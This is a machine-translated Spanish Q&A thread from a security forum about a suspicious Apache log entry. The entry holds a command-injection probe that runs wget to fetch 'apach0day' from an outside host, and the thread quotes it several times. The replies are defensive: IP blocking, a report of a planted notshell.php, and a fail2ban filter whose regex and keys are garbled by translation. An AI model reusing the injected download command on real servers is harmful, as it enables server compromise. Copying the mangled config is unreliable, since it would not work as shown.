Registros de Apache, registro sospechoso de apach0day

4

hoy recibí esto

16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day"

así que con

HTTP_USER_AGENT: chroot-apach0day
REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day

aparece en el registro de acceso y parece sospechoso ... ¿Alguna idea sobre eso?

    
pregunta ptx 28.07.2014 - 21:28
fuente

3 respuestas

3

Proxypipe.com es alojado por Voxility S.R.L (AS39743) (AS3223). Se sabe que Voxility es una mala empresa de hospedaje al permitir el hospedaje de malware, enviar correo basura, ejecutar DDoS, etc. desde sus IP.

Es mejor bloquear todos sus rangos de IP, de lo contrario, es posible que esté lidiando con ataques DDoS. Experimenté esto todo el día antes.

Puede encontrar una lista de sus rangos de IP aquí Voxility (AS39743) y Voxility (AS3223)

    
respondido por el BigBob1000 29.07.2014 - 03:02
fuente
1

Yo también tengo sondas similares. Sin embargo, tengo tres sondas diferentes, todas con cargas útiles diferentes. La ejecución de ls -a mostró un nuevo directorio llamado .ssh en mi raíz de documentos, con un archivo llamado notshell.php

Inmediatamente eliminé el directorio y destruí la instancia de DigitalOcean

Supongo que alguien está intentando crear algún tipo de ataque en los servidores

    
respondido por el dreadiscool 29.07.2014 - 02:46
fuente
0

Aquí hay una solución rápida y sucia para bloquear usando fail2ban. (Si actualmente no usa fail2ban, busque en Google su sistema operativo).

Si tiene instalado fail2ban, vea más abajo. Tenga en cuenta que las ubicaciones de los archivos fail2ban pueden ser diferentes, dependiendo de su sistema operativo. El siguiente ejemplo es de un servidor Debian. Esta muestra no cubre los tiempos de prohibición, etc .-- solo cómo crear un filtro y agregarlo a jail.local. Hay muchos ejemplos de configuración fail2ban en google para múltiples sistemas.

Rápido y sucio (Debian Linux):

1) Cree un nuevo archivo apache-0day.conf en /etc/fail2ban/filter.d que contenga:

# Fail2Ban archivo de configuración
# Filtro limitado para detener los ataques de apach0day

[Definición]
Opción: failregex
# Notas: regex para coincidir con este tipo de solicitud:
# 162.253.66.77 - - [28 / Jul / 2014: 19: 02: 00 +0000] "GET /? x0a / x04 / x0a / x02 / x06 / x08 / x09 / cDDOSpart3dns; wget% 20proxypipe.com / apach0day; HTTP / 1.0 "200 359" - "" chroot-apach0day "

failregex = ^ -. "(GET | POST). \? proxypipe | apach0day. $
Opción: ignoreregex
Notas: expresiones regulares para ignorar. Si esta expresión regular coincide, la línea se ignora.

Valores: TEXTO

# ignoreregex =

2) Filtro de prueba con comando: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf

3) Edita /etc/fail2banl/jail.local, para agregar esta cárcel:

[apache-0day]
enabled = true
puerto = http, https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2

4) Pruebe la nueva configuración general (observe las ADVERTENCIAS y corríjalas, si es necesario): fail2ban-client -d

5) Reinicie fail2ban: /etc/init.d/fail2ban restart

    
respondido por el Jim B 29.07.2014 - 04:16
fuente

Lea otras preguntas en las etiquetas